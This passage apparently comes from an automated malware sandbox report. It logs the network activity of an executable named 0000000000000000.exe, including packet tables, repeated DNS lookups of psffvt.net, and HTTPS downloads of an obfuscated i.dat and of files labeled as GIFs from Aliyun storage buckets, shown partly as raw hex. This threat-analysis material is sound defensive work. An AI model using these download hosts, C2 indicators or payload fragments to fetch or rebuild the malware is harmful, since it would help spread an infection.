Jan 1, 2025 08:31:42.349020004 CET	443	50017	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:42.349039078 CET	50017	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:42.349071026 CET	50017	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:42.349839926 CET	50017	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:42.349859953 CET	443	50017	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:42.349870920 CET	50017	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:42.349905968 CET	50017	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:47.685564041 CET	50019	8917	192.168.2.4	8.217.35.192
Jan 1, 2025 08:31:47.690500975 CET	8917	50019	8.217.35.192	192.168.2.4
Jan 1, 2025 08:31:47.690603971 CET	50019	8917	192.168.2.4	8.217.35.192
Jan 1, 2025 08:31:48.107706070 CET	50019	8917	192.168.2.4	8.217.35.192
Jan 1, 2025 08:31:48.112660885 CET	8917	50019	8.217.35.192	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 08:30:32.809005976 CET	50949	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:30:33.438388109 CET	53	50949	1.1.1.1	192.168.2.4
Jan 1, 2025 08:31:08.697705984 CET	49341	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:31:09.335833073 CET	53	49341	1.1.1.1	192.168.2.4
Jan 1, 2025 08:31:46.870815039 CET	62975	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:31:46.880606890 CET	53	62975	1.1.1.1	192.168.2.4
Jan 1, 2025 08:31:52.915359020 CET	64761	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:31:52.945584059 CET	53	64761	1.1.1.1	192.168.2.4
Jan 1, 2025 08:31:58.962327957 CET	50492	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:31:58.972274065 CET	53	50492	1.1.1.1	192.168.2.4
Jan 1, 2025 08:32:05.009421110 CET	65259	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:32:05.019078970 CET	53	65259	1.1.1.1	192.168.2.4
Jan 1, 2025 08:32:11.056405067 CET	65263	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:32:11.086308002 CET	53	65263	1.1.1.1	192.168.2.4
Jan 1, 2025 08:32:17.109486103 CET	49558	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:32:17.155358076 CET	53	49558	1.1.1.1	192.168.2.4
Jan 1, 2025 08:32:23.181101084 CET	64488	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:32:23.190367937 CET	53	64488	1.1.1.1	192.168.2.4
Jan 1, 2025 08:32:29.212304115 CET	64342	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:32:29.242542028 CET	53	64342	1.1.1.1	192.168.2.4
Jan 1, 2025 08:32:35.274979115 CET	63238	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:32:35.283804893 CET	53	63238	1.1.1.1	192.168.2.4
Jan 1, 2025 08:32:41.306061983 CET	51802	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:32:41.336745977 CET	53	51802	1.1.1.1	192.168.2.4
Jan 1, 2025 08:32:47.370759010 CET	57744	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:32:47.379769087 CET	53	57744	1.1.1.1	192.168.2.4
Jan 1, 2025 08:32:53.399844885 CET	63230	53	192.168.2.4	1.1.1.1
Jan 1, 2025 08:32:53.409164906 CET	53	63230	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 08:30:32.809005976 CET	192.168.2.4	1.1.1.1	0x5db1	Standard query (0)	3syd1z.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:31:08.697705984 CET	192.168.2.4	1.1.1.1	0x6131	Standard query (0)	22mm.oss-cn-hangzhou.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:31:46.870815039 CET	192.168.2.4	1.1.1.1	0x6e7c	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:31:52.915359020 CET	192.168.2.4	1.1.1.1	0x8ced	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:31:58.962327957 CET	192.168.2.4	1.1.1.1	0x131b	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:05.009421110 CET	192.168.2.4	1.1.1.1	0xbd0d	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:11.056405067 CET	192.168.2.4	1.1.1.1	0x86c2	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:17.109486103 CET	192.168.2.4	1.1.1.1	0xb62d	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:23.181101084 CET	192.168.2.4	1.1.1.1	0x3160	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:29.212304115 CET	192.168.2.4	1.1.1.1	0x9529	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:35.274979115 CET	192.168.2.4	1.1.1.1	0x81cf	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:41.306061983 CET	192.168.2.4	1.1.1.1	0x75f9	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:47.370759010 CET	192.168.2.4	1.1.1.1	0x5541	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:53.399844885 CET	192.168.2.4	1.1.1.1	0x778c	Standard query (0)	psffvt.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 08:30:33.438388109 CET	1.1.1.1	192.168.2.4	0x5db1	No error (0)	3syd1z.oss-cn-beijing.aliyuncs.com	sc-2ox2.cn-beijing.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 1, 2025 08:30:33.438388109 CET	1.1.1.1	192.168.2.4	0x5db1	No error (0)	sc-2ox2.cn-beijing.oss-adns.aliyuncs.com	sc-2ox2.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 1, 2025 08:30:33.438388109 CET	1.1.1.1	192.168.2.4	0x5db1	No error (0)	sc-2ox2.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		39.103.20.97	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:31:09.335833073 CET	1.1.1.1	192.168.2.4	0x6131	No error (0)	22mm.oss-cn-hangzhou.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 1, 2025 08:31:09.335833073 CET	1.1.1.1	192.168.2.4	0x6131	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 1, 2025 08:31:09.335833073 CET	1.1.1.1	192.168.2.4	0x6131	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		118.178.60.9	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:31:46.880606890 CET	1.1.1.1	192.168.2.4	0x6e7c	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:31:52.945584059 CET	1.1.1.1	192.168.2.4	0x8ced	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:31:58.972274065 CET	1.1.1.1	192.168.2.4	0x131b	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:05.019078970 CET	1.1.1.1	192.168.2.4	0xbd0d	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:11.086308002 CET	1.1.1.1	192.168.2.4	0x86c2	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:17.155358076 CET	1.1.1.1	192.168.2.4	0xb62d	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:23.190367937 CET	1.1.1.1	192.168.2.4	0x3160	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:29.242542028 CET	1.1.1.1	192.168.2.4	0x9529	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:35.283804893 CET	1.1.1.1	192.168.2.4	0x81cf	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:41.336745977 CET	1.1.1.1	192.168.2.4	0x75f9	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:47.379769087 CET	1.1.1.1	192.168.2.4	0x5541	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 08:32:53.409164906 CET	1.1.1.1	192.168.2.4	0x778c	Name error (3)	psffvt.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

3syd1z.oss-cn-beijing.aliyuncs.com

22mm.oss-cn-hangzhou.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	39.103.20.97	443	7624	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:30:34 UTC	111	OUT	GET /i.dat HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:30:35 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:30:34 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 6774EF1A9AB67D3036F633F2 Accept-Ranges: bytes ETag: "A1DCF4DAA9E8E5EDD6705AD2A497E3BB" Last-Modified: Tue, 31 Dec 2024 10:01:09 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 17586380570206300013 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: odz02qno5e3WcFrSpJfjuw== x-oss-server-time: 3
2025-01-01 07:30:35 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 03 43 49 54 65 2e 7a 3b 48 48 16 58 36 75 3a 3d 54 57 54 53 34 7d 32 3f 56 46 4a 51 32 22 7f 32 5d 5f 1d 53 7d 34 3a 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 35 5d 41 41 45 36 7f 6a 6a 59 19 13 0e 3f 74 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 00 40 4a 57 66 2d 79 38 4b 4b 15 5b 35 76 39 3e 57 54 57 50 37 7e 31 3c 55 45 49 52 31 21 7c 31 5e 5c 1e 52 7c 35 3b 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 5c 40 40 44 37 7e 6b 6b 58 18 12 0f 3e 75 21 Data Ascii: l%00CITe.z;HHX6u:=TWTS4}2?VFJQ2"2]_S}4:555555555555555555555555555555555]AAE6jjY?t aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33@JWf-y8KK[5v9>WTWP7~1<UEIR1!\|1^\R\|5;444444444444444444444444444444444\@@D7~kkX>u!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	39.103.20.97	443	7624	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:30:36 UTC	111	OUT	GET /a.gif HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:30:36 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:30:36 GMT Content-Type: image/gif Content-Length: 135589 Connection: close x-oss-request-id: 6774EF1CB980BA3834F13BCB Accept-Ranges: bytes ETag: "0DDD3F02B74B01D739C45956D8FD12B7" Last-Modified: Tue, 31 Dec 2024 10:00:06 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8642451798640735006 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw== x-oss-server-time: 16
2025-01-01 07:30:36 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-01 07:30:36 UTC	4096	IN	Data Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c Data Ascii: Xgf%a(\|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\aU##l3]x(c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg\|M[mm&}!rt=b!){{4{e5\|8
2025-01-01 07:30:36 UTC	4096	IN	Data Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
2025-01-01 07:30:36 UTC	4096	IN	Data Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 Data Ascii: uc}.0VmO2O?:G6O#y;10[XhvX&+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz\|7I}r@\|
2025-01-01 07:30:36 UTC	4096	IN	Data Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 Data Ascii: /r+.'wH:M7N0]%'Me"!pu\|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
2025-01-01 07:30:36 UTC	4096	IN	Data Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)\|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#\|1-PWlno<\|vwx1P]LHXEI
2025-01-01 07:30:36 UTC	4096	IN	Data Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
2025-01-01 07:30:36 UTC	4096	IN	Data Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a Data Ascii: UqLT&&oabc\|}~x3~=,N<>HEO>L.XU_.\heo+lxu;\|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
2025-01-01 07:30:36 UTC	4096	IN	Data Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph\|{NJL
2025-01-01 07:30:36 UTC	4096	IN	Data Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd Data Ascii: eWUsXa`e/nnbc\|}~x;9y}QTp\|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o\|PRSTY'xe89-jYkk$P}wtuixyz\|~9~mMtwv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	39.103.20.97	443	7624	C:\Users\user\Desktop\0000000000000000.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:30:38 UTC	111	OUT	GET /b.gif HTTP/1.1 User-Agent: GetData Host: 3syd1z.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:30:38 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:30:38 GMT Content-Type: image/gif Content-Length: 125333 Connection: close x-oss-request-id: 6774EF1E6BDBB73638DE8D5C Accept-Ranges: bytes ETag: "2CA9F4AB0970AA58989D66D9458F8701" Last-Modified: Tue, 31 Dec 2024 10:00:06 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10333201072197591521 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LKn0qwlwqliYnWbZRY+HAQ== x-oss-server-time: 14
